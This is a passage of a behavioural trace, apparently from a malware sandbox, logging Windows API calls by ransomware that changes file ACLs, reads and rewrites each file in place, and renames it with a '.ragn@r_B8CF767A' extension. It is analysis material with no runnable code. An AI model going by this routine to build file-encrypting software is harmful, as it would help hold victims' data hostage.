lpNumberOfBytesRead=0x5affd08, lpOverlapped=0x0 | out: lpBuffer=0x35842c8*, lpNumberOfBytesRead=0x5affd08*=0xf, lpOverlapped=0x0) returned 1 [0170.427] VirtualAlloc (lpAddress=0x0, dwSize=0x13c4a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0170.427] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.427] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affd24 | out: lpNewFilePointer=0x0) returned 1 [0170.427] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x13c4a, lpNumberOfBytesRead=0x5affcf8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affcf8*=0x13c4a, lpOverlapped=0x0) returned 1 [0170.431] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affcfc | out: lpNewFilePointer=0x0) returned 1 [0170.432] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13c4a, nNumberOfBytesToLockHigh=0x0) returned 1 [0170.432] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x13c4a, lpNumberOfBytesWritten=0x5affcf4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affcf4*=0x13c4a, lpOverlapped=0x0) returned 1 [0170.433] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13c4a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0170.433] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.434] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13c4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.434] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0170.434] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affd34, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5affd34*=0x100, lpOverlapped=0x0) returned 1 [0170.434] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affd34, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5affd34*=0x100, lpOverlapped=0x0) returned 1 [0170.435] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affd38*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affd34, lpOverlapped=0x0 | out: lpBuffer=0x5affd38*, lpNumberOfBytesWritten=0x5affd34*=0xf, lpOverlapped=0x0) returned 1 [0170.435] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0170.435] GetProcessHeap () returned 0x3520000 [0170.435] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35842c8 | out: hHeap=0x3520000) returned 1 [0170.435] CloseHandle (hObject=0x3bc) returned 1 [0170.440] lstrcpyW (in: lpString1=0x5aff8a4, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" [0170.440] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.ragn@r_B8CF767A" [0170.440] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 191 os_tid = 0xf4 [0170.562] GetNamedSecurityInfoW () returned 0x0 [0170.563] SetEntriesInAclW () returned 0x0 [0170.563] SetNamedSecurityInfoW () returned 0x0 [0170.564] LocalFree (hMem=0x35c9b20) returned 0x0 [0170.564] LocalFree (hMem=0x35c9b34) returned 0x35c9b34 [0170.564] LocalFree (hMem=0x355e408) returned 0x0 [0170.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 0x20 [0170.564] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0170.564] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affb84 | out: lpFileSize=0x5affb84*=3314) returned 1 [0170.565] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.565] GetProcessHeap () returned 0x3520000 [0170.565] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35842c8 [0170.565] ReadFile (in: hFile=0x3bc, lpBuffer=0x35842c8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affb3c, lpOverlapped=0x0 | out: lpBuffer=0x35842c8*, lpNumberOfBytesRead=0x5affb3c*=0xf, lpOverlapped=0x0) returned 1 [0170.571] VirtualAlloc (lpAddress=0x0, dwSize=0xcf2, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0170.572] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.572] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affb58 | out: lpNewFilePointer=0x0) returned 1 [0170.572] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xcf2, lpNumberOfBytesRead=0x5affb2c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affb2c*=0xcf2, lpOverlapped=0x0) returned 1 [0170.572] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affb30 | out: lpNewFilePointer=0x0) returned 1 [0170.572] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xcf2, nNumberOfBytesToLockHigh=0x0) returned 1 [0170.572] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xcf2, lpNumberOfBytesWritten=0x5affb28, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affb28*=0xcf2, lpOverlapped=0x0) returned 1 [0170.572] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xcf2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0170.573] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.573] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xcf2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.573] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0170.574] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affb68, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affb68*=0x100, lpOverlapped=0x0) returned 1 [0170.574] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affb68, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affb68*=0x100, lpOverlapped=0x0) returned 1 [0170.574] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affb6c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affb68, lpOverlapped=0x0 | out: lpBuffer=0x5affb6c*, lpNumberOfBytesWritten=0x5affb68*=0xf, lpOverlapped=0x0) returned 1 [0170.574] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0170.574] GetProcessHeap () returned 0x3520000 [0170.574] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35842c8 | out: hHeap=0x3520000) returned 1 [0170.574] CloseHandle (hObject=0x3bc) returned 1 [0170.576] lstrcpyW (in: lpString1=0x5aff6d8, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" [0170.576] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.ragn@r_B8CF767A" [0170.576] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 192 os_tid = 0xf00 [0170.845] GetNamedSecurityInfoW () returned 0x0 [0170.846] SetEntriesInAclW () returned 0x0 [0170.846] SetNamedSecurityInfoW () returned 0x0 [0170.848] LocalFree (hMem=0x35c9b20) returned 0x0 [0170.848] LocalFree (hMem=0x35c9b34) returned 0x35c9b34 [0170.848] LocalFree (hMem=0x355e408) returned 0x0 [0170.848] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 0x20 [0170.848] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0170.848] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affa30 | out: lpFileSize=0x5affa30*=77748) returned 1 [0170.848] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12fa5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.849] GetProcessHeap () returned 0x3520000 [0170.849] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35842c8 [0170.849] ReadFile (in: hFile=0x3bc, lpBuffer=0x35842c8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5aff9e8, lpOverlapped=0x0 | out: lpBuffer=0x35842c8*, lpNumberOfBytesRead=0x5aff9e8*=0xf, lpOverlapped=0x0) returned 1 [0170.851] VirtualAlloc (lpAddress=0x0, dwSize=0x12fb4, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0170.852] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.852] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affa04 | out: lpNewFilePointer=0x0) returned 1 [0170.852] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x12fb4, lpNumberOfBytesRead=0x5aff9d8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5aff9d8*=0x12fb4, lpOverlapped=0x0) returned 1 [0171.139] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff9dc | out: lpNewFilePointer=0x0) returned 1 [0171.139] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12fb4, nNumberOfBytesToLockHigh=0x0) returned 1 [0171.140] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x12fb4, lpNumberOfBytesWritten=0x5aff9d4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5aff9d4*=0x12fb4, lpOverlapped=0x0) returned 1 [0171.140] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12fb4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0171.140] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.142] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12fb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.142] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0171.142] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affa14, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5affa14*=0x100, lpOverlapped=0x0) returned 1 [0171.142] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affa14, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5affa14*=0x100, lpOverlapped=0x0) returned 1 [0171.143] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affa18*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affa14, lpOverlapped=0x0 | out: lpBuffer=0x5affa18*, lpNumberOfBytesWritten=0x5affa14*=0xf, lpOverlapped=0x0) returned 1 [0171.143] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0171.143] GetProcessHeap () returned 0x3520000 [0171.143] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35842c8 | out: hHeap=0x3520000) returned 1 [0171.143] CloseHandle (hObject=0x3bc) returned 1 [0171.148] lstrcpyW (in: lpString1=0x5aff584, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" [0171.149] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.ragn@r_B8CF767A" [0171.149] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 193 os_tid = 0xed4 [0171.384] GetNamedSecurityInfoW () returned 0x0 [0171.391] SetEntriesInAclW () returned 0x0 [0171.391] SetNamedSecurityInfoW () returned 0x0 [0171.392] LocalFree (hMem=0x35cd880) returned 0x0 [0171.392] LocalFree (hMem=0x35cd894) returned 0x35cd894 [0171.392] LocalFree (hMem=0x355e408) returned 0x0 [0171.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 0x20 [0171.392] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0171.392] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affddc | out: lpFileSize=0x5affddc*=3419) returned 1 [0171.392] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xd4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.392] GetProcessHeap () returned 0x3520000 [0171.392] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35842c8 [0171.393] ReadFile (in: hFile=0x3bc, lpBuffer=0x35842c8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affd94, lpOverlapped=0x0 | out: lpBuffer=0x35842c8*, lpNumberOfBytesRead=0x5affd94*=0xf, lpOverlapped=0x0) returned 1 [0171.398] VirtualAlloc (lpAddress=0x0, dwSize=0xd5b, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0171.399] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.399] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affdb0 | out: lpNewFilePointer=0x0) returned 1 [0171.399] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xd5b, lpNumberOfBytesRead=0x5affd84, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affd84*=0xd5b, lpOverlapped=0x0) returned 1 [0171.399] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affd88 | out: lpNewFilePointer=0x0) returned 1 [0171.399] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd5b, nNumberOfBytesToLockHigh=0x0) returned 1 [0171.400] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xd5b, lpNumberOfBytesWritten=0x5affd80, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affd80*=0xd5b, lpOverlapped=0x0) returned 1 [0171.400] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd5b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0171.400] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.400] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xd5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.400] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0171.401] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affdc0, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affdc0*=0x100, lpOverlapped=0x0) returned 1 [0171.401] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affdc0, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affdc0*=0x100, lpOverlapped=0x0) returned 1 [0171.401] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affdc4*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affdc0, lpOverlapped=0x0 | out: lpBuffer=0x5affdc4*, lpNumberOfBytesWritten=0x5affdc0*=0xf, lpOverlapped=0x0) returned 1 [0171.401] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0171.401] GetProcessHeap () returned 0x3520000 [0171.401] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35842c8 | out: hHeap=0x3520000) returned 1 [0171.401] CloseHandle (hObject=0x3bc) returned 1 [0171.421] lstrcpyW (in: lpString1=0x5aff930, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" [0171.421] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.ragn@r_B8CF767A" [0171.421] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 194 os_tid = 0xf1c [0171.395] GetNamedSecurityInfoW () returned 0x0 [0171.396] SetEntriesInAclW () returned 0x0 [0171.396] SetNamedSecurityInfoW () returned 0x0 [0171.396] LocalFree (hMem=0x35cd880) returned 0x0 [0171.396] LocalFree (hMem=0x35cd894) returned 0x35cd894 [0171.397] LocalFree (hMem=0x355e408) returned 0x0 [0171.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 0x20 [0171.397] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0171.397] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5effeb8 | out: lpFileSize=0x5effeb8*=82346) returned 1 [0171.397] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x1419b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.397] GetProcessHeap () returned 0x3520000 [0171.428] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35842b0 [0171.428] ReadFile (in: hFile=0x3b8, lpBuffer=0x35842b0, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effe70, lpOverlapped=0x0 | out: lpBuffer=0x35842b0*, lpNumberOfBytesRead=0x5effe70*=0xf, lpOverlapped=0x0) returned 1 [0171.430] VirtualAlloc (lpAddress=0x0, dwSize=0x141aa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0171.431] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.431] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effe8c | out: lpNewFilePointer=0x0) returned 1 [0171.438] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x141aa, lpNumberOfBytesRead=0x5effe60, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effe60*=0x141aa, lpOverlapped=0x0) returned 1 [0171.489] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effe64 | out: lpNewFilePointer=0x0) returned 1 [0171.490] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x141aa, nNumberOfBytesToLockHigh=0x0) returned 1 [0171.490] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x141aa, lpNumberOfBytesWritten=0x5effe5c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effe5c*=0x141aa, lpOverlapped=0x0) returned 1 [0171.491] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x141aa, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0171.491] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.492] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x141aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.492] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0171.493] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effe9c, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effe9c*=0x100, lpOverlapped=0x0) returned 1 [0171.493] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effe9c, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effe9c*=0x100, lpOverlapped=0x0) returned 1 [0171.493] WriteFile (in: hFile=0x3b8, lpBuffer=0x5effea0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effe9c, lpOverlapped=0x0 | out: lpBuffer=0x5effea0*, lpNumberOfBytesWritten=0x5effe9c*=0xf, lpOverlapped=0x0) returned 1 [0171.493] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0171.493] GetProcessHeap () returned 0x3520000 [0171.493] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35842b0 | out: hHeap=0x3520000) returned 1 [0171.493] CloseHandle (hObject=0x3b8) returned 1 [0171.505] lstrcpyW (in: lpString1=0x5effa0c, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" [0171.505] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.ragn@r_B8CF767A" [0171.505] MoveFileExW 